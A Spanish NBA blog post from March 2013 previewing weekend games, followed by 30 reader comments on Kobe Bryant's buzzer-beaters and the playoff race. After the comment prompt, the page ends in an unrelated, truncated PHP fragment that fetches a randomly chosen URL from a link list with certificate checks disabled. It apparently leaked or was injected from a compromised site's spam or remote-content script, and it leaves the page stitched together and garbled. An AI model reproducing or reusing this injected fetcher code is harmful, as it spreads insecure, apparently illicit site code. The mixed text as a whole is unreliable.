Fin de semana: ahora sí, ahora va en serio

08 de March de 2013 por MagicJohnson32

Reconozcámoslo: la regular season de la NBA es larga, muy larga, tal vez demasiado larga. Nosotros somos unos enfermos y nos  tragamos cualquier partido, nos vemos todos los box scores y seguimos la actualidad de la liga hasta el más mínimo detalle. Pero casi todo lo que ha pasado hasta ahora carece de importancia.

Lo bueno empieza ahora.

En el Oeste, las calculadoras echan humo ante la apasionante carrera por las últimas plazas de Playoffs. Los Warriors parecen a salvo, pero una mala racha o una torcedura de tobillo de Curry, y adiós. Rockets y Jazz, poseedores de las plazas séptima y octava, están prácticamente empatados, y a menos dos partidos de distancia ya acechan los Lakers.

Y en el Este, el principal interés está en la lucha entre Knicks y Pacers por la segunda posición, y en el orden que ocuparán Nets, Hawks, Celtics y Bulls. La pregunta: ¿es mejor ser cuarto, con ventaja de campo en primera ronda, o caer a la sexta o séptima plaza y evitar a los Heat hasta las finales de conferencia? Es para pensárselo.

Este fin de semana puede ayudar a aclarar el panorama… o a enredarlo todavía más.

En orden cronológico, los partidos que se disputarán son éstos:

VIERNES

  • Thunder @ Bobcats (1h00): los últimos finalistas visitan al peor equipo de la liga. Sorprendería si el partido no estuviese sentenciado antes del descanso. Sessions se perderá las próximas semanas con un esguince en los ligamentos de la rodilla.
  • Pacers @ Magic (1h00): segundo contra penúltimo del Este. Los Magic vienen de caer con todos los honores en Miami. Los Pacers viajan a Florida sin Granger, que reposará su maltrecha rodilla pocos días después de reaparecer. Para la ocasión, Vaughn dará a Tobias Harris su primera titularidad desde que está en Orlando. Se la ha ganado.
  • Grizzlies @ Cavs (1h30): tras el más que asumible tropiezo ante los Heat, los Grizzlies siguen con su marcha de crucero hasta el punto de amenazar la tercera plaza de los Clippers. En Cleveland se presentan sin Randolph ni Arthur, así que Ed Davis compartirá pintura con Marc. Dion Waiters vuelve para los Cavs pero Kyrie Irving está enfermo y jugará limitado.
  • Mavs @ Pistons (1h30): poco o nada en juego esta noche en Auburn Hills, salvo que los Mavs aún crean en sus posibilidades de luchar por los Playoffs. Greg Monroe llegaba con problemas físicos pero parece que jugará, cosa que no hará Shawn Marion por unas molestias musculares.
  • Wizards @ Nets (1h30): mucho más igualado de lo que indican los standings. Ante los pobres resultados recientes y la falta de química, Carlessimo ha optado por degradar a Humphries al fondo del banquillo. Beal va mejorando del tobillo pero no reaparecerá en Brooklyn, por lo que Ariza será de nuevo el SG titular de los Wizards.
  • Sixers @ Heat (2h00): justo lo que necesitaban los 76ers, una visita a los campeones y poseedores de la mejor racha de la liga. Los de Philadelphia han perdido 10 de los últimos 11 encuentros, mientros los Heat suman 16 triunfos consecutivos. Podéis apuntar ya la 17ª.
  • Jazz @ Bulls (2h00): sin Hinrich, Hamilton y Gibson (y sin Rose, que ya tiene el permiso médico para jugar pero esperará a sentirse seguro cuando machaque saltando con la izquierda), los Bulls recibirán a un equipo necesitado de victorias y que recuperará a Al Jefferson. Los Jazz ya han caído a la octava plaza del Oeste tras perder dos partidos seguidos y tienen a los Lakers a un partido y medio.
  • Hawks @ Celtics (2h00): de los cuatro equipos que luchan por la cuarta posición del Este, dos se enfrentan el viernes. La impresionante victoria de los Celtics en Indianapolis y su inagotable capacidad de lucha los convierte en favoritos.
  • Blazers @ Spurs (2h30): otro ejemplo admirable de cómo gestionar las bajas de tus estrellas son los Spurs, que esta temporada han ganado 5 de 6 partidos sin Parker. Sólo tres equipos han vencido en el Alamo en lo que va de curso, y los Blazers no parecen llegar con suficientes credenciales. El partido lo emite Cuatro en directo.curry lin
  • Suns @ Kings (4h00): los dos últimos de la Pacific se enfrentan sin la presencia de Gortat, que ha coronado su pésima campaña con una lesión en el pie. Scola será el C titular de los Suns, con lo que probablemente Cousins se saldrá (y Scola, también). El duelo Thomas vs Dragic puede ser lo más interesante.
  • Rockets @ Warriors (4h30):Run & Gun! Steph Curry, James Harden, Klay Thompson, Chandler Parsons… y mucho en juego. El duelo entre californianos y texanos, separados por dos partidos en la clasificación, se presenta espectacular. Un triunfo de los Warriors sellaría casi definitivamente su sexta plaza pero los Rockets ya les han ganado dos veces en el último mes, incluyendo la de los 23 triples.
  • Raptors @ Lakers (4h30): a hombros de Kobe Bryant, los Lakers prosiguen su remontada hacia los puestos de Playoffs y jugarán hoy pendientes de lo que pase en Chicago y Oakland. Los Raptors no deberían de suponer un obstáculo difícil de superar, pero ya se sabe que los angelinos son especialistas en encontrar complicaciones sean cuales sean las circunstancias.

SÁBADO

  • Nets @ Hawks (1h00): tras jugar en Boston la noche anterior, los Hawks reciben a otro de sus competidores directos. Los Nets hace apenas un par de semanas aspiraban a la segunda posición del Este, y ahora están a 1,5 partidos de caer a la séptima posición.
  • Jazz @ Knicks (1h30): el retorno de Melo está en el aire de cara a la visita de los Jazz, pero los Knicks ya ha demostrado que son competitivos sin su líder ganando en Detroit y cayendo dignísimamente ante los Thunder.
  • Bobcats @ Wizards (2h00): el duelo entre Kemba Walker y John Wall es nuestra única esperanza para salvar de la mediocridad absoluta a este partido entre dos de los últimos tres peores balances de la NBA.
  • Hornets @ Grizzlies (2h00): cuando los Hornets todavía se preguntan qué pasó en ese final de partido contra los Lakers (especialmente en esta jugada), los colistas de la Southwest visitan a uno de los gallos de la división y la mejor defensa de la liga. Les va a hacer falta algo más que suerte.
  • Wolves @ Nuggets (3h00): como un tiro van estos Nuggets, liderados por Lawson y a los que no hay que descartar incluso para la tercera plaza del Oeste tras tumbar recientemente a Thunder y Clippers. Más difícil todavía, pues, para los Wolves, en los que un Ricky cada vez mejor se las ingenia para dignificar a un equipo que sale con Stiemsma de pívot titular.
  • Rockets @ Suns (3h00): un desplazamiento teóricamente cómodo espera a los Rockets en Phoenix, donde los Suns siguen en busca de la identidad perdida. Partido de ganar sí o sí para Houston.
  • Bucks @ Warriors (4h30): Milwaukee vio interrumpida en pista de los Clippers su excelente racha, que incluía victorias en Dallas y Houston, gracias principalmente a Monta Ellis, quien visita a su ex equipo en su mejor momento como jugador de los Bucks. Ilyasova es duda para este partido en el que no pueden descuidarse los Warriors, que necesitan victorias para seguir cimentando su posición.

DOMINGO

  • Celtics @ Thunder (18h00): tras la lesión de Rondo, muchos vimos a los Celtics como un inocente corderito listo para ser devorado. A estas alturas, ya se han revelado como el lobo feroz, que no se asusta ni ante los temibles Thunder. Partidazo.
  • Bulls @ Lakers (20h30): otro must win para los Lakers, en este caso ante un equipo tan competitivo como los Bulls, antes de irse a una mini gira por el Este. En función de los resultados del fin de semana, una victoria podría colocar a los angelinos en plazas de Playoffs. Es decir: probablemente perderán.paul george lebron
  • Pacers @ Heat (23h00): ¿algún candidato en el Este como alternativa a los Heat? Paul George y sus Pacers se ofrecen al menos a intentarlo. Como adelanto a un más que posible enfrentamiento en los Playoffs, tenemos este excelente aperitivo.
  • Sixers @ Magic (23h00): tal vez exagere si digo que los Magic se presentan como favoritos en su partido ante los Sixers, pero las sensaciones que ofrecen los de Orlando son infinitamente mejores que las que llegan desde Philadelphia. El partido sirve además como recordatorio a los Sixers de que dieron a Iguodala y Nikola Vucevic a cambio de un cojo.
  • Cavs @ Raptors (23h00): partido de lo más intrascendente. Voy a escribir el nombre de Kyrie Irving para rellenar un par de líneas, porque no hay nada que decir sobre el encuentro.
  • Blazers @ Hornets (0h00): se trata de un caso similar al anterior, sólo que los Blazers aún conservan posibilidades -remotas, para ser sinceros- de entrar en Playoffs.
  • Mavs @ Wolves (0h00): estamos en las mismas. Dallas tira de orgullo y del talento de Nowitzki, Carter y Mayo a pesar de que la temporada se acabará casi seguro sin Playoffs por primera vez desde la temporada 1999-2000. Una victoria en Minnesota serviría para poco más que estirar las esperanzas.
  • Bucks @ Kings (2h00): los Bucks serán octavos y serán arrasados por los Heat en primera ronda, mientras los Kings sólo aspiran a acabar con dignidad la que puede ser su campaña de despedida de Sacramento.
  • Pistons @ Clippers (2h30): en el segundo partido que acogerá el Staples Center el domingo, los Lob City Clippers reciben a los inofensivos Pistons, incapaces de alcanzar el centenar de puntos en diez de los últimos once partidos. Va a tener trabajo Calde tratando de frenar a CP3.
Comenta

30 comentarios a esta entrada

  1. Ekos dice:
    #1

    Deron Wiliams on-fire!

      Citar

  2. MagicJohnson32 dice:
    #2

    Ekos:
    Deron Wiliams on-fire!

    ¡¡¡Ra-ta-ta-ta-ta-ta-ta!!!

      Citar

  3. Ekos dice:
    #3

    MagicJohnson32: ¡¡¡Ra-ta-ta-ta-ta-ta-ta!!!

    ¡PUM! ¿Récord NBA no? 9 triples en una parte…

      Citar

  4. MagicJohnson32 dice:
    #4

    Sí, récord absoluto. Ojo a los 12…

      Citar

  5. Ekos dice:
    #5

    De momento van 10 de 13

      Citar

  6. MagicJohnson32 dice:
    #6

    Se ha parado en 10. Difícil va a estar.

      Citar

  7. Ekos dice:
    #7

    Muy muy difícil, 10 de 14…

      Citar

  8. Ekos dice:
    #8

    Al final nada, 11 de 16…

      Citar

  9. Denise dice:
    #9

    Tremendo Kobe…42 puntos ,12 asistencias y metiendo triples y canastas para forzar prorroga y finalmente ganar a Toronto. Van a alcanzar mas pronto a Utah de lo que pensaba, y ojo, sé que soy muy pesado y lo he dicho varias veces, pero el calendario de Lakers en marzo es muy facil y tienen la 6º plaza a 3 partidos. Ahora mismo, apostaría a que se jugarían dicha plaza con Houston, ya que GSW va de capa caida.

    De esta noche vi el que echaba en abierto, el Spurs-Blazers, antes de empezar pensaba que me acostaría en el descanso ya que en teoría sería un partido placido para los texanos. Pues no!!, Repaso, paliza, humillación o como quiera que se llame el que recibió Popovych y los suyos de mano de unos Blazers con un nivel de acierto increible, con un Lillard cojonudamente bueno que va camino de convertirse en una versión superior a Derrick Rose!!. ¿Cuanto tiempo haría que los Spurs no recibian 136 puntos en casa, en un partido sin prorroga? Al final, victoria de Blazers de 30.

      Citar

  10. Pop dice:
    #10

    Lo de Kobe en los últimos partidos es demencial.

      Citar

  11. Jose Luis dice:
    #11

    Hollinger pone un me gusta en los números de Rudy Gay: 7-26 con 6 pérdidas, y jugándose las últimas y no anotándolas

      Citar

  12. Jose Luis dice:
    #12

    Lo de Kobe es impresionante, recuerda a aquella temporada que también hizo no sé si fueron 5 buzzer beaters contra Bucks, Kings, Heat a tablero… lo único es que los Lakers no deben ganar así, en PO esto es imposible porque harán faltas duras (el mate para ganar la defensa es blandiblú) y las defensas buenas no permitirán este tipo de actuaciones de Bryant. Pero de Bryant no se puede decir nada malo, y cuando falle, no se le podrá crucificar.

    PD: otro libre de Nash al limbo en los últimos segundos, me ha recordado al final de partido con los Pistons

      Citar

  13. Viva_Dirk dice:
    #13

    Los 3 triples de Kobe al final del último cuarto me han puesto cachondo, vaya pasada. El que anota a falta de un segundo, con el bote agotado y con Anderson encima es físicamente imposible…me recuerda a Theo Ratliff, jojojo.

      Citar

  14. MagicJohnson32 dice:
    #14

    Lo de Kobe es absurdo.

      Citar

  15. nba dice:
    #15

    MagicJohnson32:
    Lo de Kobe es absurdo.

    Los americanos van a tener que crear una nueva entrada en el diccionario, para la definicion de Buzzer beater con la foto de Kobe ilustrandola …

      Citar

  16. rumbero dice:
    #16

    Denise:
    con un Lillard cojonudamente bueno que va camino de convertirse en una versión superior a Derrick Rose!!.

    Que pelotazo han pegado los Blazers con este chaval. Crucemos los dedos para que no le pase ninguna desgracia. El nivel que mostró al final del tercer cuarto y principio del 4ª es de auténtico superclase, poniendose el equipo a la espalda como si llevara 12 años en la liga.

    Lo de Kobe lo acabo de ver ahora y hay poco que añadir. Lo decía después del partido contra Hornets, está para MVP pero no le va a llegar por donde estan los Lakers. Interesante lo que comentaba ayer Daimiel respecto al nivel que está monstrando con su edad y la comparativa con la vuelta de Jordan en el el segundo three-peat. Únicos

      Citar

  17. Ruxixón dice:
    #17

    Lo de Kobe es tremendo,cuando se retire dejando los Lakers a otro tio,sea Howard o cualquier otro,vaya legado que deja,impresionante.SI no es por Kobe y tal como vaticiné,los Raptor se pudieron llevar el partido tranquilamente,si no hubiera mediado el 24 y si un tal Rudy Gay hace alarde de una IQ de un niño de benajmines.Desastre total su final de partido y gran parte de culpa en la derrota de los Raptors.

    Hoy juegan los 3 rivales de los Lakers,Utah en New York,Houston en Phoenix y Golden State,que ya están metidos en el ajo,frente a MIlwaukee.Tiene toda la pinta de que hoy Jazz y Lakers empatan en la clasificación.

      Citar

  18. Zukuo dice:
    #18

    ohhh my god! Kobe MVP! que 3 triples .Alguien recuerda algo parecido??
    Creeis que si mantiene este ritmo durante los 20 partidos que queda y Lebron se relaja un poco tiene Kobe posibilidades de MVP? y para Lebron siempre quedará el MVP de las finales.

      Citar

  19. Jose Luis dice:
    #19

    Stoudemire fuera 6 semanas, vamos, hasta play-offs, por culpa de las rodillas.

    Sin Anthony ni Stat hoy los Knicks, tenía que ser contra Utah 🙁

    Lo único es que lo mejor de Utah son interiores y Chandler, Thomas, Camby si que juegan. Supongo que Copeland tendrá minutos y Smith, sus 30 tiros xD

      Citar

  20. Jose Luis dice:
    #20

    17 arriba al descanso los Knicks, que están jugando bien. Kenyon Martin jugando bastante bien hoy, mucho pick & roll y anotando fácil en la pintura. Triples como siempre, ha habido varios. Utah muy muy mal.

      Citar

  21. Viva_Dirk dice:
    #21

    Como no llama mucho la atención por los números, os recomiendo la primera parte de Andre Miller ayer frente a los Wolves, vaya clase, vaya control de partido….¡¡¡¡JUGÓN!!!!

    Espero que Ricky tomase nota.

      Citar

  22. rumbero dice:
    #22

    Vaya regalito de jornada para los Lakers. Si ganan esta tarde se meten en PO
    Tela con los Suns que se han puesto a ganar y llevan un 50% en los ultimos 10 partidos y van subiendo posiciones. Ayer fue gracias al buen partido de Dudley y el final de último cuarto de Dragic que estuvo imparable. Marshall dejó buenos detalles (ojo al pase entre las piernas a Osik) y Haddadi nos regaló un 6/11 en 28 minutos. Para verlo

      Citar

  23. Jose Luis dice:
    #23

    Haddadi nunca ha sido tan malo como lo han tenido en Memphis. Un tio muy alto que rebotea bastante bien, quizá le falte velocidad y es normal, pero poco más. Para pívot suplente me parece bastante cumplidor. Me parece mejor que Aaron Gray por poner un ejemplo.

      Citar

  24. rumbero dice:
    #24

    No si a mi también me parece mucho más aprovechable de lo que era en Memphis aun siendo un cacho carne importante. Pero es curioso ver plantar cara a los Suns con él, los Morris, Marshall, Johson,etc

    Los Celtics llevan aguantando a Durant todo el partido gracias sobretodo a Pierce pero parece que se les van a escapar los Thunder y va a ser por culpa de secundarios como Jackson, Collison y Martin.

      Citar

  25. Denise dice:
    #25

    Los Lakers-Bulls no eran a las 21:30???? En fin…cuando los he puesto me los he encontrado casi en el descanso, han debido empezar como una hora antes. De momento, partido muy comodo para Lakers con una superioridad abismal en el rebote.

      Citar

  26. Jose Luis dice:
    #26

    Han cambiado la hora en USA Denise. Ahora es una hora menos de diferencia, 5 horas. Así que habrá partidos a las 12 casi todos los dias, y partidos hoy a las 11. ¡Hay que aprovechar hasta el 31 de Marzo que cambiamos la hora en España!

      Citar

  27. Denise dice:
    #27

    Jose Luis:
    Han cambiado la hora en USA Denise. Ahora es una hora menos de diferencia, 5 horas. Así que habrá partidos a las 12 casi todos los dias, y partidos hoy a las 11. ¡Hay que aprovechar hasta el 31 de Marzo que cambiamos la hora en España!

    Gracias tio, ni se me había ocurrido que podía ser por el cambio de hora. Bueno, aunque me haya perdido la primera parte, he podido ver la segunda. Partido muy comodo de Lakers, con una superioridad en el rebote durante casi todo el partido, con todos los jugadores aportando y pro tanto sin tener que necesitar la versión heroe de Bryant. Esta vez si le han metido bastantes balones a Howard, que ha acabado con 16 puntos, la mayoria de ellos mates o de empujarla. Eso si, en la pintura ha sido dueño y señor, capturando 21 rebotes y dejando inoperante a Noah, salvo en los minutos de la basura donde el frances ha maquillado estadisticas.

    Los Lakers siempre han estado entre 8 y 12 puntos arriba, de vez en cuando Bulls recortaba a 6, pero en ningun momento daba la sensación de poder voltear el marcador. Mala impresión la que me ha dejado Bulls, jugando con un ritmo muy cansino, y sin variaciones ofensivas que pudieran suponer un cambio de rumbo o revulsivo en el juego, lo cual es entendible ya que a parte de la ya conocida ausencia de Rose, le faltaba medio banquillo con Hinrich, Gibson y Hamilton,

    En fin, que los Lakers parecen haber cogido la quimica y la confianza necesaria, salvo lesión gorda de Kobe o Howard se van a meter en Playoffs, y viendo su calendario, no descartaría que alcanzasen la 6º posición y previsiblemente tuvieramos un derbi angelino en Primera Ronda.

      Citar

  28. Denise dice:
    #28

    Bueno,pues aprovechando el cambio de hora me pondré a ver al menos el primer cuarto del Orlando-Philadelphia. El trabajo no me va a permitir verlo entero. 🙁
    De momento, Vucevic ha salido con ganas de decir…”Mamones, os equivocasteis al traspasarme por el idiota de Bynum”. Supermotivado el montenegrino de momento, que ya ha atrapado unos cuantos rebotes en un abir cerrar de ojos

      Citar

  29. Denise dice:
    #29

    Jo, pues está bonito el Orlando-Philadelhia. 28-30 al final del primer cuarto. Ambos equipos con grandes porcentajes de tiro, anotando con facilidad, con gran fluidez en el juego, el reloj no se para ya que apenas hay faltas, un continuo toma y daca.
    Y destacar al Dios Jameer Nelson. 8 puntos y 7 asistencias en el primer cuarto. Mañana en la cronca teneis que ponerlo como MVP !!!!!

      Citar

  30. Denise dice:
    #30

    Pues lleva el descanso en el Amway Arena y voy a acostarme con pena ya que desde el punto de vista del espectaculo esta siendo un partidazo. 56-51 al descanso con progresión de que esto se resuelva por encima de los 110 puntos. Como digo, partido muy fluido, con un ritmo muy alto y muy pocas faltas o interrupciones de juego.
    Con Nelson y Vucevic que van a ccnseguir un doble-doble con la gorra, mas Afflalo y Harris en plan anotadores, los Magic no le dan respiro a unos 76ers donde solo su trio interior Young-Turner-Hawes está haciendo algo digno de mención.
    El en teoría mejor jugador de este partido, Jrue Holiday, está haciendo un partido lamentable y desatroso, habiendose comido ya unos cuantos gorros y perdiendo balones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>